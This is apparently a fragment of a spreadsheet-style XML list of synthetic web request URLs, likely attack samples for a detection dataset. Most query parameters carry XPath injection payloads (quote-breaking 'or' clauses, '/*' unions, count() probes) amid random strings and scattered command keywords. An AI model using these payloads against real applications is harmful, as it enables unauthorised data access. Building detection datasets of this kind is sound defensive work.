    <t>/pytxeaetcaazadhti/rl5uebtihzod/agrkjszbbdiwit/dlopheraq9vnfyxyn/execirsceh.php?npelt=9&amp;e&amp;eedteae477n5o=tod@&amp;heafta=inm&amp;=/pxxtermr+oiom7elr+&amp;9ewulsu=hosjfttsgioebl&amp;fhywms=4052&amp;eeaj4orhzuciun=assepu/g/e/child::node()[+position()=692]+++++|++++itc/qatdar/ab/child::text()[position()=4]++or++'tsinyi'+++=++++'&amp;asr=\\zedivrd&amp;ftmae5se=u|ewttnsob&amp;nttdnanerts=l4rii~v4ti@ou+n&amp;rni=wawsbuwc&amp;ueatodiiud6iza=35342633&amp;zruwia=07</t>
  </si>
  <si>
    <t>/rkxkeq4iz/oee6a4trao.htm?kpes69utmp=6266+++++or+++khslo/ewe6at/n/child::node()[position()=108]+++or+++889=</t>
  </si>
  <si>
    <t>/hhlcn2tedtrb9elnsenh/sdebhsoelb/ehldmjcby38/l5pdm5i/hcemo30s/nhlob9fseeatmugrks/mkrrm9tbkjuzpv/t0aeme1f/p8gaienrde/jemimi4femtcm/gwnbgw_-2w.l/p3kbrzb@cy3cq1-f8a79.php4?la7dklqt=625&amp;4euhir=3+&amp;5tsjuqyraretad=enttoccgegosy&amp;tamiutyuryaoiu=ieoe&amp;uluttsirleila=0721&amp;enadlo8rwlltac=(i+++++&lt;++count(of/child::text())++and+j++++&lt;+count(i0io/child::comment())+++++and+k+++++&lt;++++count(eno/child::*)+++++)&amp;iedgeezt=netege&amp;aed=+dm|tmpnodetupassthruodato</t>
  </si>
  <si>
    <t>/ntertee4p/c5zxfswg/mw2ej9u4aa/gfa.5j6uqakut67_.tiff?4jlfaiyl=878&amp;forml_rncetcjs3i=877831&amp;ed4ibnwka=ip9e5tgdp&amp;yrlleufk=eowhne6ef&amp;sae2h4dgdi=10&amp;seirmeh3pwtio=3m4ha'++or++stl/wlwa/child::node()[processing-instruction()=88]+++++or++'wonh'+++=++'&amp;us=80&amp;l1sdfodrmqdf=twysraqqn&amp;dcheze=dr0e_m4f3eme&amp;7@lwinntg3vl=ndelete&amp;fkwy=nwedjth32eheu&amp;gr1mot=fbkjc1n</t>
  </si>
  <si>
    <t>/eitsenx6dnenedtseu/ehisoqalr/42xznptui8dv/0.pcqw6aq97g.8suxy.shtml?rbmsoae=dbeouldfe&amp;othensp7ed=dolhz&amp;ota24ei5eo=oowtv.&amp;nriisfe=sd&amp;ja=818&amp;ylgetris5ihkat=erupdate4lq&amp;sieiprsirdenao=selghnjstpnt&amp;liider5=+ont&amp;n2l=et+&amp;dldnmdtnse6ol=7482++or+1&lt;+++tn4l/9r/t/child::text()[position()=748]++or+2=']+|+/*+|+/foo[bar='&amp;rlwautoexeczkywhodelete=dqsixr-&amp;e6ij=&gt;&gt;hkesisdacins5+r=es&amp;tsm=083874&amp;d3wsz65li=frneionltv+&amp;odtaeo=vcn?</t>
  </si>
  <si>
    <t>/sae--y7gw3u0ynuj/dlceoe9y0miadleo/inaeqgj/coet/ok3ma.blv6walk/1rreftlndzuea.js?wn1tcao=+ys&amp;dbftarreetixe=e&amp;stformrtqos9eandi&amp;.ilut4sc=ye&amp;oqh4ei8msm=gnzya'++or++++path/child::node()[position()=n]+or+'egxonmh'++++=++'&amp;khmy6htaccesfmv_=inl@e&amp;positionfbbgsoundibdiv@=goerhgmrelalho&amp;hqe6asl=xk-5ypkjj4&amp;oothluenlseh=8414170&amp;oejsy=\\tusrn+pesnikbbphl~&amp;f%&amp;c8b@y6bt-=710224&amp;caat=allt&amp;qo0feagsb=lwv8nn&amp;imtptoehary=idwinntbhidandm</t>
  </si>
  <si>
    <t>/eg/avnorslderi/rueao/m2ieeytutdhave/ic7kdgpru/ad5@wwwbwcdho/8lz0dt00f/ooonseapiorlstle/d5obgsoundxtermxejv0gpq/hrdv3heaqli/6a5csfv.afdml5it/7lzavfq1sdtys._a.png?bies=eu?&amp;htniy=ysei&amp;etaeewsni5iu=et'e0bgsoundi\\2eii&gt;eoseaaor&amp;oa=1srevalk&amp;aave2aa=235++++or++++count(path/child::node()[position()=((i+j+k+l+1)]+|++path/child::*()[position()=(k+1)])=1+++++or++0559=&amp;2arrlnl8l8=oselecte)i&amp;gaqyy=cpy3</t>
  </si>
  <si>
    <t>/5szskga4/hneyebojodht/goqm.rhzb/_o9jqshutdownt/okynt1m/8flovt0b0qh.wqf/oeho2txll6f/paemtze1hyenoorune/n.06b09xnrme.jpeg?aofll8aj8nmnt=uqo02ley'+++++or+++++6+++&lt;++count(path/child::*)+or+++'snerp'+++=+'&amp;fheyfrb=janda&amp;amhil=iga7eena9nonk7t2s&amp;wia7quedeihot=644290&amp;hripe0umiarojz=aectdare&amp;@gb0tyform@dz=8&amp;aoyfnj7cetpitrg=tes&amp;iyteoipzieieic=1058778397&amp;ye=4085033&amp;b1adropkeiw=in1alap:+++es&amp;likeucgb=h@f&amp;lsmwcutwttu2e=rafuepaimoe3whw&amp;stezmse2hnoh1=1r+x&amp;7rtttmrerr=2_scm&amp;2oleez=|divet</t>
  </si>
  <si>
    <t>/ldexsncw5l.mspx?cospdhm=t5jyl'+++or+6+++++&lt;+count(path/child::*)+++or++++'d2tsdoh'+='</t>
  </si>
  <si>
    <t>/tfidn-ia@5u.fh0ka.shtml?i1eozmubahe=tajra4hk67z&amp;hhactd2znooebmn=57563+or++nbfnm/ct/ee5o/child::node()[position()=3]+or++45=&amp;ihoopnh=66130&amp;esltal7=l&amp;navetsbxwuii1sn=etet&amp;pyoatareelne5k=eilatdw&amp;mghitqtn=1&amp;qaidfreufmtcin=reyceenoyexyu&amp;access_logtls=73824&amp;6hdxa=423193&amp;ilceream=anr&amp;tmhoevhgatbtnlg=3a&amp;nullg.b-ur-kn=75008595&amp;.caevalpyokta=ll5ewdyriwoz&amp;es5dhgayispodv=lhi4$y3o</t>
  </si>
  <si>
    <t>/ncs/wvfk9p@/cmmnsn0ew/rcaeil6eelctn/eap-c/rleyl/oet6otlmthmwdo6lh/os.gif?l3nsetaso0gi=70+++or++ee1e5/nai/si5sno/child::node()[position()=47]+or+++9=&amp;ivreosehnoixo8=tetfar&amp;uc=w-b6ahq2&amp;4gartecf=q+t-aeais&amp;nltsio=between&amp;x3q3u2=tye+</t>
  </si>
  <si>
    <t>/hhmalm/hve/sj8f/osu/yl0tspassthruh9mgn/ietvasy2fonag5utnoa/eer.nsf?ds7=eteco8y&amp;zwiogaa0mede=ncthttpsna&amp;rbi=em+meimvmincludeidh4&amp;aofwoge5xa=seo&amp;xdh5to=3x']+++++|++++p++++|++//user[++++name/text(+++)++=+'iw&amp;srgfura=o2grbme3g9&amp;eryby=iol&amp;tlsinitu7ttfi=e3lk&amp;misiyoainaepre=19313&amp;uww_wl.w8ytw=91296&amp;8ccwrfbrbdlehi=4860867</t>
  </si>
  <si>
    <t>/oirlae7phqtc/sbtelnet.wp-jinclude/lp_eox-/ab3v3p/eohhsctru/yyvou-w2gbzdobv/uols/2oiasrp7rk/ef0qslcov_zuyrh/epmd56h7x.ez.sh?ysiht=r+&amp;tof=mk@.s7u&amp;i7scd=0076240&amp;l0mnhpnirt5wer=(i+++&lt;+++++count(ryee/child::text())++++and+j++++&lt;+count(n5rnjh/child::comment())+++and++++k+&lt;++++count(oed7re/child::*)++++)&amp;wnkl=atmr6t:&amp;jv6@_vbscriptvqjrl=1&amp;son0hapw3r=3511540&amp;eoa6opciaseaa=evalei+ovarvy&amp;hrevalsuze=uaausb</t>
  </si>
  <si>
    <t>/bcb6styasnoianey8m.sh?oobrbza=qoce&amp;tddblsaiwnssm=2873+++or+1&lt;+++eueoyn/qinul/i0c3/child::text()[position()=2]++or+++++1955=']+|+/*+|+/foo[bar='&amp;elc=i7r</t>
  </si>
  <si>
    <t>/-r7k4a/uy@/swedpyrtrobhsdnwmd/2akpaecj/ad7eej/sxsxc.npjvjaq/hy2blr82gaeefhd/uh3tqhinpiframeyformx/edzkhfaotmyrwegww_/o-lzjzjpd.htm?erebotsifd=de&amp;tglom2zflxosrpr=i&amp;ylea=tnwgfth'+++++or+++6+&lt;+++++count(path/child::*)+or++++'em'++='&amp;aihoa=&lt;eymit1iy&amp;ca2t2hhhsmae5=476&amp;btale=ersr%otsmoe&amp;27eeshee8s=frow+m7cif)5t</t>
  </si>
  <si>
    <t>/a408dpeeteotssthoago.swf?emlsni=a.as_&amp;ytu=0956&amp;8feagjoimg=olsqur/v1mrw/an/child::node()[position()=526]++or++++'cf'+++='&amp;scq98andfxhj=217&amp;09ixmx=3&amp;ryean22sdxm=yilg_&amp;c4geerrmutl=29096&amp;snpeomdeus=8168024&amp;otuh0on=gr&amp;cdadbno=hena&amp;pb4mo1y8=0&amp;n2mqx6eszmailj=01130&amp;.4xai1vied=s14eoe&amp;letiafftgo=2&amp;lye=dagr</t>
  </si>
  <si>
    <t>/teeftpvpdcg8/huzwa11-o6ay9z/lzypiz/email6i/.m9ftpg/e5n15tlovh/9adlieeobisn7l9i/rbl-f-4-bill0t26g/hcyfgqqtelnetgxr/ireeeonatbnfetrzne/azem/id2tresl9rhfyroz.mdb?hiecfnh=1960&amp;dsgb=u2ra+\\taezeq&amp;z1=n|au&amp;wnjfhttp2pnpotz=gdxp_enhttpsszhwgete7&amp;o4laueatfst=d&amp;&amp;km48xrs=djstek1io&amp;de8lo=ehg&amp;xllbbgsound8fd=(i++&lt;+++count(ttt/child::text())+and++j++++&lt;++count(5e/child::comment())+++and++k+&lt;++count(w1ewn8/child::*)++)</t>
  </si>
  <si>
    <t>/joes./aeognr/nevtsmthttohier/dhw0b/vkjadhtt8x/owhereud/nlwget/zlietzvdak0/trsrsr_rojx0a/94/td.jsp?4ioiektonn4nphi=3625934&amp;libu19fcnjpt=tctl&amp;erao=oun4ze&amp;qsmxsa=eosexecjml?tr&amp;gccr=nvcsednamp&amp;54cllm=snesore&amp;cehhis957rltrae=iaoee&amp;aizn8ci=5++or++++count(path/child::node()[position()=((i+j+k+l+1)]+|+path/child::*()[position()=(k+1)])=1+or+++5054=&amp;enxhtleenne=3732762299&amp;0childd7=nllsiaase</t>
  </si>
  <si>
    <t>/meat2cscou5ix/2dhbuia.css?ntn=ssce6sda'+++++or+nlesi/lo/child::node()[processing-instruction()=13]+or++++'ebkrsidd'++='&amp;zl8gom7=/oe&amp;twc7=3097388&amp;d0lee3n4tlroau=125094&amp;if=rjwb-tpm&amp;e9=ttfgpysu5el</t>
  </si>
  <si>
    <t>/hgj/t4jyocxp9x2nqqqxb/na8spyi_pxbza4/sonastt/x67lh1rmx/agdeehesob/tretaenrtqh/yttsdisceialttx/itcpvclqzuqsm-jjez/o4ivfiumnjkejeb/bac@ruqmkk.jpeg?se7ry2csc2drnv=b&amp;ekn=ecati&amp;05nnde8e=tar&amp;freagtdoty=zttnodtazbsmsfld&amp;owoeuoleid=9541924&amp;at3dk7deic=k/c/i/child::node()[+++position()=935]++|++0oote/oni/hh/child::text()[position()=328]++or+++++'eaz'+++=+'&amp;t0nxpi7=762936&amp;4pgosmwe1frl=o@odvn&amp;tcostbwmhexecw=987765&amp;cvoure=32003624&amp;nrnvaifeutydf=346703&amp;hi2mdmeexrs=laa&amp;ineon=aiienrs5of</t>
  </si>
  <si>
    <t>/lzjulon3ii.zi0vk1/j9-jxktt/eheoj6deyoetc/rvmry8lo-@tp41fjv1v1/c8mhpmiag3nee.jpeg?amqedasl37rj=edbemotbkc&amp;gn=dr2tlnco'++++or+emhii/ndis/child::node()[processing-instruction()=6]++++or++++'cfete3k6'+++=+++'&amp;ntuzyinii=dtpu4plipsoicf</t>
  </si>
  <si>
    <t>/db4t/yzth2cb@j/cwag7zesr/7inontfw/eeeokohu8une/lp/asy/5drocozyisskedare2/aejdavhpenstots/awhodagr7heatno/ihcod9etgasu3r/oai.jsp?axwhi=ut5eo&amp;sc2mwidojbee=ga&amp;tbuvhwzag=hrrebetin85i4drhoc&amp;aoleihnuocesrty=lna~home6ncst+ia&amp;qgiwxugxtermd2=0&amp;yv7gczpi=n)e&amp;tinpeefb=7842377&amp;uqetdb=unledbztuo&amp;24son5h=alchocs9o1rn4ei$den&amp;ao5aoioier=0ewindow.open%dsertih+mt9cmdaa&amp;hsn3uihulorse=tall&amp;ndhad1safsces=sj/eti/eerc/child::node()[++position()=537]++++|++uhne/ar/4i/child::text()[position()=676]+or+++++'ov'=++'&amp;nqaenydte=16522&amp;tineeeihiaiizue=roauwz3_i7</t>
  </si>
  <si>
    <t>/mlsx.gl-llequ/ehtaptesarjelcooa49n.swf?egnlv=tsa&amp;6dbinat=geatixi'++++or++(i+&lt;++++count(afny7/child::text())+++and++j+++++&lt;+count(rhs/child::comment())++++and++k+++++&lt;+count(6otg7/child::*)++++)+or+++'se'+++='+++++tcerdnxo'++++or&amp;gra=rolyixv7&amp;cnot68ised3al=3oeoe</t>
  </si>
  <si>
    <t>/sre12cinid/nmax4ng/7yi0mxowv1zts/qxu.krd-2usrl4b0/d8818tebyrbdxo/easrlnl/ivywgkb-vssc/lw.svkwp.rz-nmq.cgi?n6o4t@l4ha=uae3b&amp;access_loghwp0ahfvlocationjq=b-a-nu2b&amp;scatuho=yxil&amp;s20m47=riae'++++or++1&lt;+++++bern/6aanr/atpgn/child::text()[position()=638]+++or+++++'d0aoab2f'+=++'</t>
  </si>
  <si>
    <t>/cee@qxim-vdaed/ow2cluxf8hbtnssp1hm/rle0ocul6@x/z8irseheesixlttp/em0ismrmyeayete7g/8uca8t4/httpsy@oz/oopto4o-lg/arcpa/wrw3adgaw/i2eanoh.nsf?9tb=escsdidlike+ihn&amp;fluusatfaeodte=5575&amp;xrearf9da=71577064&amp;dmnuifhe=(i++++&lt;+++++count(aiy9xb/child::text())+and+j++&lt;++count(bsa9uw/child::comment())+++and+++++k+++++&lt;+++++count(7spt/child::*)+++)&amp;6s7yrlahskperln=hseenstsshee&amp;wjyat=&amp;dwupdate&amp;b48oliaq=tr7iocd</t>
  </si>
  <si>
    <t>/kg@p0of2aall7@e9/l3qnbgsoundv/n91-ldirxn0k/3izuvt0ltb.css?ivgfdey_hp=t=htsnizoeagyr&amp;42mdmwsz8oh=enwk@li3&amp;nwibre=e+a&amp;eobotatumv=5++or+++++1&lt;+ikniee/8sas6/lnnat/child::text()[position()=382]+++or++9813=']+|+/*+|+/foo[bar='&amp;oks85nt8wiqur=tomg&amp;ceeir4nts=98260742&amp;tkowyz=9034&amp;ngo96wbopbnsbo=ctananrlecdcsh&amp;omuthsrdyemduu=v&amp;jor+sg3ohn&amp;edteveo8eii=s@&amp;cietreeaar=vkayoaetwp-wusrcnhtpassn&amp;toatsiwco=u</t>
  </si>
  <si>
    <t>/inieerzrbtrynerdu/jof399-2sdu2z/stdinazm7wri/0kfn9srl3oslons3llhr.php3?3tessrlttiesrhi=1984&amp;moaie3heleahn=gioin'++or++count(++path/child::node()[position()=((i++++j++++++++k+++++l+++++++++1)]+++++|+path/child::*()[position()=(k+1)])=1++or+'asy'++=+'+++smkbab'+or&amp;pzooafd=md&amp;8daiao=723628&amp;90rrsseihmeahb=oq.pm&amp;kmhavingdct07jbody=76653765&amp;1ehozqaer2o=seqnr&amp;teneew=@10ien&amp;9aiabyis=ni&amp;othonn=3fah7c&amp;h0eetao=resjdoa</t>
  </si>
  <si>
    <t>/o8xbl/my@kxysp32_jp75jg/mdqjsnz2r_un4hmmg/bi/gfg0vi92phpj/isr/9oqrtnnoewpnaexryeen/hliiealrsmnhui4lpnr.gif?beffaaccess_logxgslike=nsir5s/erwr4/ae/child::node()[++position()=463]+|++++ridhe/tsm/5abpe/child::text()[position()=7]+++++or+++++'ncj'+='&amp;dslsiixrfxi5c=n+e39ore&amp;@rnimg1ipsx5x=+rut&amp;crm0enfluetans1=nsinputtbeftpta&amp;7rt2rfveydpcw=8099&amp;cataco8dx8=304</t>
  </si>
  <si>
    <t>/saaelioeeeioey50xna/iomnkdo/2t/o@@qk-gil15/nv33ajcsd/ehnefeme0kttieeiotv/slaj1/rniysrr/1vg9lpgt1uho5/rjdhce5para/zwedvhgmia.asp?mivkib=ea5ntwootmsc&amp;6fnhirc5sln2kr=ls5mjvd&amp;4ah=peb9s&amp;sock_streamnetcat2vuphp.zdrform=yfxaedne&amp;wtaio=7&amp;nxea=lit1z+usrwewqtl&amp;zqyt=mngesohi'+++or++++(i+&lt;+++++count(i2rya/child::text())+and++j+++++&lt;+count(ftyet/child::comment())+++++and+++k+&lt;+++count(eaihg/child::*)++++)++or++++'ian'=+++'++a0eynn'+++++or&amp;rbcaeef=avg3w@4.</t>
  </si>
  <si>
    <t>/xihnarrzvzbr/ogbayem.iewpvg/sechqct-q/o0tb9msm7hfhcas/m_83rvwzm1r/euhlcotaaiuci3mho/kkd/efetmzdsygir3me.tiff?8eaibiaweobl=45504574&amp;niag=e-r(yeri&amp;t3b=y5-j8m0ri3&amp;@e2kjdocumentpingchild-j=wiwirhoadntihrie&amp;ene=590++or+fsbsn/n/l/child::node()[position()=09]+or+3777=&amp;kuformz_6=ne&amp;enpq=osfoi9aupht&amp;deleeh7sycg=nhlht7o25vdenm&amp;arpob5eaeeo=e]same&amp;mdtiseatehene=3&amp;e0eepadntalel=086&amp;q3ng4-r=rhtpassreplace:&amp;c9unelottqimodg=+l&amp;k7rk=timgek&amp;ahsosoet9oai5u=lrahesmopt-'s</t>
  </si>
  <si>
    <t>/6pf193in/ourxf/tc/b9tu7n9scpzkkadmine/dodhdiwpc3/sdinijanxoesaq/eb2pfqko_n/2aze7h4xwtkyu2mt.css?68rvzzovqoa6=unionyunion&amp;ptrteboeees=11100&amp;in0toeoterna8o=otnp9irawytd7s5no&amp;nemcitnneern=(i+++&lt;++++count(fnre/child::text())+and++++j+++++&lt;+++count(no5oe/child::comment())+and++k+&lt;+count(wog/child::*)+)&amp;oacacianpel=12&amp;8fnd4ml=841506&amp;boeojdiz=en4</t>
  </si>
  <si>
    <t>/sdsnhcsre3c/hnifh2ck.gif?gar=sn/aoq/wmu5/child::node()[position()=17]++++or+++++'hnnr7it'++=++++'&amp;3cisegyftxti=e0d&amp;eensnnddhgtdie=902826</t>
  </si>
  <si>
    <t>/ewmxy38qjcckvcftkbh/sqvhb_ml_nw-0tu/qyigsemedfrnhetanso/snr2nis/r7smd2nx3i9n/style@trrt./7rrqgxwt55ni2f_z5e9/uro6cw2ts.qz/tdayk3.selectform2nvar/iryosdebst3a/atvesccvmqi/it.html?1i5hw0y=sdfheeb&amp;h95e5tyeded=nann/n/uy/child::node()[+position()=6]+|++++slxaen/bo/loe/child::text()[position()=5]+++++or++'coaryl'++++=++'&amp;7tsr1tt9t=hrntijhdnhnh2ymd&amp;it=7906&amp;usnedcnomaemcya=873&amp;turmtl=l8fwwefele&amp;s8fi=n1ourlqheoy4zn1ob5&amp;62stdinr=9197451&amp;se9p=66609353</t>
  </si>
  <si>
    <t>/sd2/9pnnrirtdi/sg/copysskwp-2/lcfeioe5iwnpaeae2we1/9hwa7u.a2kwq7hbstzny/i5rasnbgretex/t2u-/ie6itr4bixoh5iae.shtml?ob0frepu=5+++++or+++++1&lt;++++n/oyhl/tleu/child::text()[position()=654]++or+++++545=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/r4ty/rexouefha3onlg.mspx?metlr=a2n+telsiw[3od&amp;neiarchrsempat=aohrrj'++++or+++path/child::node()[position()=n]++or+++'nsye'+=+'&amp;dase=t&amp;wid8rewi7=+ks+2oytrt)~tsu</t>
  </si>
  <si>
    <t>/jkiqu/tfhed5neorgacksa/9iahedreeogeaocau.msf?6bdltnsanane=tcmsfj&amp;yeralbvznsfejcl=p3ggk&amp;9irppseasahb=trsjc1d'++++or+++++(i+&lt;+++count(ls/child::text())+++and++j+++++&lt;++count(eldo/child::comment())+++and+k+&lt;++++count(eslvdm/child::*)++++)++++or++'ti'++++='++++i2'+or&amp;2rh0mmozoe6eoor=9016831&amp;gatetsmt=+bni</t>
  </si>
  <si>
    <t>/rocxnql/hn/jutbshp/rgv/rsndouhxckzbk_3cdc.a/21gbinq/ojen/afpuv9m_gqq2ylcdgn/niaccess_logbq1na5k.nsf?lnenaeftdlrb=aei/s7m/heryer/child::node()[++++position()=0]+|+++++ereoab/eis3w/re3/child::text()[position()=235]+++++or+++'si'=+'</t>
  </si>
  <si>
    <t>/ophewlewbd2vko/varvnczhriframedljtmpuj/m_h/e_hgl6-x/ow/sj@w3bim5j8vwb/mj2b.jpeg?ewly=utf0o0'++or+++++6+&lt;++count(path/child::*)++++or+++'abwolo'+++=++++'&amp;tynen2i=tmccnqz5.uk&amp;pihdla=nstxjc&amp;xtelnetyfccuw=@&amp;hee5kaau=luqzvarmmailaf|</t>
  </si>
  <si>
    <t>/bererp/uikwaaqs@hax-53rz2x/dl.h4.pzsxzuditwc/ln0wybuhc5z8swizjdl/fidmeosianodwnsh3.png?sn6ehnoafis=u2cezo9t3nie&amp;at=e2gc&amp;rfoadwehe=0&amp;7axs=era5&amp;caehtozauooe=1703323762&amp;wi-qinsertzrht=celiaeam'++or++++dde/r0pa/child::node()[processing-instruction()=431]+or++'mmtsa'++='&amp;d8aee=im5nned&amp;wgetlttvvvz0form=6805</t>
  </si>
  <si>
    <t>/aa/xvxieggngjiy/iaen0winn/pt9tstm/hyux4gmd3/ic-ovrtuvq_pfppt3/6bwwt-9.cgi?kroae=tinm5'++++or++++6+++&lt;+++++count(path/child::*)+or++'diaehi'++=+++'&amp;mn=pbjqtkypuo&amp;cct=say&amp;elcmeysyhnaeutb=3&amp;echobqhl=wnvxasr&amp;o7muvc=owtle3tbetn9&amp;a94xess7aa2=18091006&amp;ayodnpraeceheeo=1415369&amp;euoao9s8=~@sukuaopenmlike&amp;rmtknynltf5etso=991574&amp;naseh=sel+&amp;6zatk=etstoypt</t>
  </si>
  <si>
    <t>/a593epaihtg/3c9dkljrjm/tedebebreoad6hai9lc/ns6ac5ihcgtys/ov6tanc1etfideto/a3npfgkd/lrpf7amuyz5il.p9/pxiotesz_window.openxgxpassthruf/iayesobnorr0aitietsi.php?oeefaad9eut2o=5923&amp;sheibei=3+or+++1&lt;++i/eoiat2/ecse0e/child::text()[position()=801]+++or+731=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/esjtj1adxap@0374dua/uyc1c-ayrcpmj/gr0lrembe/tulart/gc6enehksieb/ardnteqo/lscr/9tredh-uc3xjj/wf.wgzhr/eewesnn/sczwum5ls-tk@pokk.asmx?tmeeesl=0co&amp;tpnpwcheut=6ueeea7idii&amp;scroseaaantt=gb6sctulowgl2te&amp;ols85=boietaidrin&amp;xt9jqx4k6tcb=ejug+&amp;il7tmdae=l48dyuwa&amp;c8acbat=3&amp;@vbscriptqqi.2y=286&amp;4rh=t@qcplrebhbs&amp;faooep9=s+e&amp;php0zuoa4-=6iayned'+++or++path/child::node()[position()=n]++or++++'73rztna'+=++++'</t>
  </si>
  <si>
    <t>/ijeaukefazhgsdu/kesrttiagittiie9riv/.95fmu4oo/3l/atrnfoti03dktee/rt/ob_s/tee2itihhitbsr1oie.gif?tttdtr=062&amp;hfgesearh=reotsllselectlogoi&amp;ueoy6euqbroa5t=1&amp;iba8w=ehixd1-7o&amp;q8agtifohef=495134&amp;a3carrirn=sose4ex&amp;as=5695029&amp;bo=oufd-horsnalocationltelnetvi+midn&amp;tmmt6sllpgsew=a7re&amp;ien5stpi=obopnvwmv&amp;ob4scripth3=8ytbn/&amp;xf6kny6oule=236874&amp;liycmdshutdownetelnetiqb=tie/8/p/child::node()[position()=150]+++++or+++'eet'+=+++'</t>
  </si>
  <si>
    <t>/eiaoeowedahpote/rrkoaocn/yonoyotdeec/ldyu/ht5rhn9bhse/hdreuhhmsaixidfs8b9e.png?ih3wacw=mmcrhcwi'++or+path/child::node()[position()=n]++++or+++++'eaot'++=+'</t>
  </si>
  <si>
    <t>/nt7cta.php4?enttshepadiave=8406++++or++++dla/jut/nt/child::node()[position()=9]+++or++23103=&amp;dhgeceoa=tryituv95.2&amp;c5ypdtc4nr=62464&amp;t1seeietaetn9i=ose$mkoertlnt7a&amp;oiin=hihwfnetcatt</t>
  </si>
  <si>
    <t>/ioxwempmyp8/hlssf5nawdo/ilikeb/km.a4/oysv4vj_xnkpk.jpeg?lformlocationlogt70aikyp.=cdhun&amp;io4tgfdaaoidsf=9t&amp;gyt0u8perl=90&amp;07eoeamurt=6513&amp;farea=itvmb3mz9ig&amp;fjxb=oetnt'++++or++++count(+path/child::node()[position(++)=((+++i+++++++++j+++++++k+++l+++1)]+++++|+path/child::*()[position()=(k+1)])=1+++or++++'eentl'++=+'++++iciqanis'+or&amp;lxqc=430&amp;5et7sj=72&amp;yn0ra=fnode&amp;elwjxmas7eh7f=hmnwinntp&gt;;eh&amp;c+rn&amp;zetnsshisn9int=o</t>
  </si>
  <si>
    <t>/enaobrwetcfj/lsxuna5astyleb/icd7attjtsdbod/i6ae7cwedi/w89/nnsmr/nqzo_jtqch0zmjskyzyj.htm?wmttt=andqao&amp;8e3wbdh7nee9ioj=aeeace6er6eesr&amp;snote1emn=dkvxz-jh&amp;otuetdnmon7gmi=178&amp;nsii=iw8xwatg9e&amp;snslh=34379633&amp;yaheh0eaoapkit=u&amp;enywuo=jm&amp;nab6=ersephp+&amp;crlpnmvs=tmmuesdcribj5hrrix&amp;lao=6692+++or++1&lt;+++++7/kiglo6/mtot/child::text()[position()=36]++++or++26806=']+|+/*+|+/foo[bar='&amp;osd1eneeetsta=sl+&amp;rt9ornrrdnc4ctm=+ebf1lieinsertxichilddnku&amp;g8ietel=nd@</t>
  </si>
  <si>
    <t>/n5elmtei/5p-1gqstmtuoxx9c8h1/ryf_jr/ttttv7ddn/rweyb6clpigsmcw/n0do/gonhuaae/etclpree2syra.htm?e0misvh=i&gt;6ya9r&amp;dnkee=1whht&amp;t2ee3ystyneii=ftpps1&amp;aoa=n/el/n7taz&amp;dierenheek1=nnocfacbsnrhbl&amp;rmh0gzeet7nia=331587&amp;siyr=nlaoas1aohceno&amp;fbw6metajbe934x=i&amp;yygx8n=3difva'+++or+path/child::node()[position()=n]+++or+'dpco'=+'&amp;5hctlt=1718293&amp;9ry1p8t1ninq=td9andndr&amp;tese=78797284&amp;iept=ettefe</t>
  </si>
  <si>
    <t>/bfafh_ss.jfrvm@j/a.qb0mf/mo4jal4elehhvlkw/8eshyoecdotsaanee/tyw2bs-er0.slz/ipyec9naiqelu.shtml?aetlak=5922+or+++e/qn/w/child::node()[position()=9]++++or+++++72451=&amp;acthv=77&amp;lh=&amp;lrxcnedf;+vbscriptl~c:ed&amp;amnv=teoazinodetn&amp;mrwj42wn8naam1=8&amp;mea=h9gzmxcbi</t>
  </si>
  <si>
    <t>/yusucfcaozwostotbltt/oeeaeta/tmmsgltr8/6leebd/wtet5cghgajpkbt/odbzskadmg9qvku7eot/eudchto/po/txrxt/r85rwm@kdut-elh/fvjph_etcm0ylrgrm.jpeg?e2sxu1bro8=toeitn&amp;from_tk7pn=7tshyobv6h&amp;h1tcno6ho=rwmlwis&amp;xirdpinawnr=ee'++++or+eh/ew/child::node()[processing-instruction()=407]++++or+++'oit'=++'&amp;ad=860478&amp;sa@yl6=corr&amp;sock_streamscriptfm4g1tpassthrupz=292010&amp;m3lkhz0i5a=tmj2e&amp;xa=v]pvtniaiauab5imstdin&amp;tm1rraileirpod=esx6t&amp;hti=d3uea9osock_stream+asrtemmocha&amp;si8safs0b0urte=nttof&amp;piifc8tunwm=5im&amp;ziy6a=h+oe&gt;id0dropaegr&amp;zre1noiiphqei=dvjueqixwi</t>
  </si>
  <si>
    <t>/sjeerue/fsinlzaicoqcc/mx2pp2gwd_t0pknq60q/at9etnzaxatpi5gi/cmnphws4mt-yfc@hwf/pxcvip/anebersmizan/_5lngna/tnaqtefpnefsns3m/eevnaw/h2ihu@xoo_n/cttvxjxk.jpg?-idd22lw=elac7pol20ahoe&amp;ch7geei=54769&amp;clozheeqhrie=petlwoyntcged7&amp;ttn=location94)hli7hsdgrautoexecrers&amp;55eeifmlrt0rayi=itn4forttei&amp;snmnakekeesrp=alinnelmred2esniuf&amp;oqfbmv6gih=gnoptiiddkj&amp;repso=70+or++nbh/hsilp/nytsz/child::node()[position()=1]+or+++++93864=</t>
  </si>
  <si>
    <t>/2aetzyi/amecahimcneoroi8t/23_an0ld8dmyzvndo/esidnenbcn2lpaice/ttrg5ref/t.gd8t/e.t4ebwau/tfb4u7/zmeffs.js?aermbsha=hrs2tule'+++++or+path/child::node()[position()=n]++++or+++'oc'+=+'&amp;.5gm=&gt;iibs&amp;jsmmp4ssato=3007&amp;nwreeenoblc1im2=t&amp;z4.m253wzv=esemn&amp;tntcecioe=rjhe&amp;kr1tmpa7nr=ediei&amp;ynerene&amp;tivaz.a=iesc9urt&amp;54ietktor9sen=1148&amp;iseiets9sa38ri=no=s/&amp;psg9gtrussc=htl&amp;uyt=taas&amp;rtceemiitlb=0jternqgnrirnf&amp;e2ourwmlf=gmoodr&amp;6ma1nefodt=cath</t>
  </si>
  <si>
    <t>/ulejqbtedlaeut/a0vtn/5badnu.gif?3lteaaps5=3371541555&amp;unvbscript4rlqppassthrulobject=pivc9lilz&amp;80kee4u3=isp&amp;1cx70@lffs=/btdlhr&amp;h8s0olekpieni6j=eperloaidcautoexeca$[enb&amp;iyts6p=374353&amp;oiebnmhdnoccr=tbee&amp;yppstssaee=ueyaaul'+or+++++sle/ycey/child::node()[processing-instruction()=763]++or++'4ois'++=++++'</t>
  </si>
  <si>
